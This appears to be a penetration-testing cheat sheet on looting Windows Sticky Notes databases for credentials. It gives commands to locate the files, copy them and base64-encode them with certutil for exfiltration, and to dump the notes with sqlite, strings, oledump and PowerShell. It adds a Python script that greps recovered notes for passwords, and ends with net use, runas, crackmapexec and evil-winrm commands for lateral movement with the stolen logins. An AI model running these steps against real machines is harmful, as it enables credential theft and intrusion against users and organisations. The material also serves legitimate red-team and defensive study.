Overview
The Windows Sticky Notes application stores user notes locally: current versions in a SQLite database, legacy versions in an OLE structured storage file. Users frequently save credentials, VPN keys, server IPs and internal information in their notes.
This makes the note store a valuable post-exploitation and privilege escalation enumeration target.
File Locations
Windows 10 (1607+) & Windows 11
C:\Users\%USERNAME%\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
Main database: plum.sqlite (SQLite, WAL mode). While the app runs, plum.sqlite-wal and plum.sqlite-shm sit next to it; notes written since the last checkpoint exist only in the -wal file.
Windows 10 (1507 / 1511), Windows 8, Windows 7
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\StickyNotes
Main file: StickyNotes.snt (OLE structured storage)
Why This Matters
Users commonly store:
- Domain credentials
- RDP passwords
- VPN credentials
- Database credentials
- API keys
- Internal URLs
- Administrator notes
This often leads directly to privilege escalation or lateral movement.
Quick Loot
Find all Sticky Notes files (-Force so hidden directories such as AppData are included)
Get-ChildItem -Path C:\Users\ -Recurse -Force -Include plum.sqlite,StickyNotes.snt -ErrorAction SilentlyContinue
From a low-privilege shell (cmd's dir does not accept wildcards in directory components, so search by filename; other users' profiles are normally readable only with admin rights)
dir /s /b /a C:\Users\plum.sqlite
dir /s /b /a C:\Users\StickyNotes.snt
Copy file
copy plum.sqlite C:\Windows\Temp\notes.db
Take the sidecars too and keep the original names: a note written after the last checkpoint exists only in plum.sqlite-wal, and SQLite only replays a WAL named <database>-wal beside the database.
copy plum.sqlite* C:\Windows\Temp\
Or exfiltrate as base64 (decode with certutil -decode notes.txt plum.sqlite on Windows, or strip the BEGIN/END CERTIFICATE lines and base64 -d on Linux):
certutil -encode plum.sqlite notes.txt
Read locally (attacker machine)
sqlite3 notes.db
.tables
SELECT Text FROM Note;
Quick dump
sqlite3 notes.db "SELECT Text FROM Note;"
If you brought plum.sqlite-wal along, open the database under its original name (plum.sqlite with plum.sqlite-wal in the same directory) so the unflushed notes are replayed; a renamed notes.db ignores the sidecar and silently drops the newest notes.
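The copy-and-read procedure above (Copy file through Quick dump), as an added example that is not part of the original page: a Python script that reproduces the SQLite side offline. It constructs its own plum.sqlite in WAL mode (only a subset of the real Note columns, with made-up note text), shows that a copy of plum.sqlite without plum.sqlite-wal loses the newest note, strips the `\id=<guid>` anchor Sticky Notes puts in front of each Text value, and greps the recovered notes for credential-looking strings. The regexes, note text and column subset are assumptions for illustration; the table and column names Note and Text are the page's own.

```python
# Added example (not from the original page): offline triage of a copied
# plum.sqlite. Builds a constructed WAL-mode database, copies it with and
# without the -wal sidecar, and greps the recovered notes. Stdlib only.
import os
import re
import shutil
import sqlite3
import tempfile

# Sticky Notes stores an inline anchor like "\id=<guid> " in front of the note
# body (commonly observed; stripping it is a no-op when absent).
ID_PREFIX_RE = re.compile(r"^\\id=[0-9a-fA-F-]+\s*")

# Loose patterns for what people paste into notes (assumption: tune per engagement).
KEYWORD_RE = re.compile(r"(?i)\b(pass(?:word)?|pwd|pw|user(?:name)?|login)\b\s*[:=]\s*(\S+)")
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
PAIR_RE = re.compile(r"^\s*(\S+)\s*/\s*(\S+)\s*$", re.MULTILINE)  # "root / P@ssw0rd!" lines

# Constructed sample notes, not real data.
OLD_NOTE = ("\\id=3a1f9c3e-0c71-4c5a-9b6d-2f0d8c1e7a40 "
            "VPN: vpn.corp.example\nUser: administrator\nPass: Winter2024!")
RECENT_NOTE = "\\id=7b52e0d1-9f3a-4e88-b1c2-0a6d5e4f3c21 DB 10.0.10.15\nroot / P@ssw0rd!"


def clean_text(text):
    """Drop the \\id=<guid> anchor so the patterns see only the note body."""
    return ID_PREFIX_RE.sub("", text or "")


def build_sample_db(local_state):
    """Create LocalState/plum.sqlite (subset of the real Note columns): note-1 is
    checkpointed into the main file, note-2 lives only in the WAL. The returned
    connection must stay open; closing the last connection checkpoints and
    deletes the WAL, as Sticky Notes itself does on exit."""
    conn = sqlite3.connect(os.path.join(local_state, "plum.sqlite"))
    conn.execute("PRAGMA journal_mode=WAL").fetchall()
    conn.execute("CREATE TABLE Note (Id TEXT PRIMARY KEY, Text TEXT, "
                 "CreatedAt INTEGER, UpdatedAt INTEGER, DeletedAt INTEGER)")
    conn.execute("INSERT INTO Note VALUES ('note-1', ?, 1, 1, NULL)", (OLD_NOTE,))
    conn.commit()
    busy, _, _ = conn.execute("PRAGMA wal_checkpoint(TRUNCATE)").fetchone()
    if busy:
        raise RuntimeError("checkpoint did not complete")
    conn.execute("INSERT INTO Note VALUES ('note-2', ?, 2, 2, NULL)", (RECENT_NOTE,))
    conn.commit()  # committed, but written only to plum.sqlite-wal
    return conn


def copy_db(src_dir, dst_dir, include_wal):
    """Mimic 'copy plum.sqlite' versus 'copy plum.sqlite*'. Names are kept
    because SQLite only replays a WAL called <database>-wal beside the file."""
    os.makedirs(dst_dir, exist_ok=True)
    for name in ["plum.sqlite"] + (["plum.sqlite-wal"] if include_wal else []):
        shutil.copy(os.path.join(src_dir, name), os.path.join(dst_dir, name))


def read_notes(db_path):
    """The page's SELECT Text FROM Note, plus Id and DeletedAt, with the anchor
    stripped. Opening the copy replays an adjacent -wal automatically."""
    conn = sqlite3.connect(db_path)
    try:
        rows = conn.execute("SELECT Id, Text, DeletedAt FROM Note ORDER BY UpdatedAt").fetchall()
    finally:
        conn.close()
    return [(note_id, clean_text(text), deleted_at) for note_id, text, deleted_at in rows]


def find_secrets(notes):
    """Return (note Id, kind, value) for every credential-looking fragment."""
    hits = []
    for note_id, text, _deleted_at in notes:
        for m in KEYWORD_RE.finditer(text):
            hits.append((note_id, m.group(1).lower(), m.group(2)))
        for m in IPV4_RE.finditer(text):
            hits.append((note_id, "ipv4", m.group(0)))
        for m in PAIR_RE.finditer(text):
            hits.append((note_id, "user/pass", f"{m.group(1)} / {m.group(2)}"))
    return hits


def demo():
    """Show that copying plum.sqlite alone silently loses the newest note."""
    with tempfile.TemporaryDirectory() as work:
        local_state = os.path.join(work, "LocalState")
        os.makedirs(local_state)
        live = build_sample_db(local_state)  # stands in for a running Sticky Notes
        try:
            copy_db(local_state, os.path.join(work, "main_only"), include_wal=False)
            copy_db(local_state, os.path.join(work, "with_wal"), include_wal=True)
            main_only = read_notes(os.path.join(work, "main_only", "plum.sqlite"))
            with_wal = read_notes(os.path.join(work, "with_wal", "plum.sqlite"))
        finally:
            live.close()
    return {"main_only": len(main_only), "main_and_wal": len(with_wal),
            "hits": find_secrets(with_wal)}


if __name__ == "__main__":
    result = demo()
    print(f"notes in plum.sqlite alone: {result['main_only']}, with -wal: {result['main_and_wal']}")
    for note_id, kind, value in result["hits"]:
        print(f"{note_id}: {kind} -> {value}")
```

Run it directly to see the two counts and the hits; on engagement data, point read_notes at your copy with plum.sqlite and plum.sqlite-wal side by side and feed the result to find_secrets.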
The .snt file is an OLE structured storage file; each note is its own storage and the note body is stored as RTF. Run strings in both 8-bit and UTF-16LE mode so neither the RTF nor any wide-character text is missed.
Convert using strings
strings StickyNotes.snt
strings -el StickyNotes.snt
Credentials often appear in plaintext.
Using oledump (list the streams first, then dump the one you want by its index N)
oledump.py StickyNotes.snt
oledump.py -s N -d StickyNotes.snt
PowerShell Live Dump (no file copy)
System.Data.SQLite is not part of Windows or .NET, so Add-Type -AssemblyName will not find it: drop System.Data.SQLite.dll (with its SQLite.Interop.dll, matching the bitness of the PowerShell host) next to the script and load it by path.
Add-Type -Path .\System.Data.SQLite.dll
$sql = "SELECT Text FROM Note"
$db = Join-Path $env:LOCALAPPDATA 'Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
# Read Only keeps the live database untouched; the -wal file in the same directory is replayed automatically
$conn = New-Object System.Data.SQLite.SQLiteConnection("Data Source=$db;Version=3;Read Only=True;")
$conn.Open()
$cmd = $conn.CreateCommand()
$cmd.CommandText = $sql
$reader = $cmd.ExecuteReader()
while ($reader.Read()) { $reader["Text"] }
$reader.Close()
$conn.Close()
Post-Exploitation Use
After obtaining credentials:
Test local admin reuse
net use \\TARGET\C$ /user:Administrator PASSWORD
RunAs
runas /user:DOMAIN\admin cmd
SMB Exec / WinRM
crackmapexec smb targets.txt -u user -p password
evil-winrm -i target -u user -p password
Typical Findings
Examples commonly discovered in engagements:
VPN: vpn.corp.local
User: administrator
Pass: Winter2024!
DB:
10.0.10.15
root / P@ssw0rd!
RDP Server:
SRV-FILE01
corp\backup-admin
Backup123!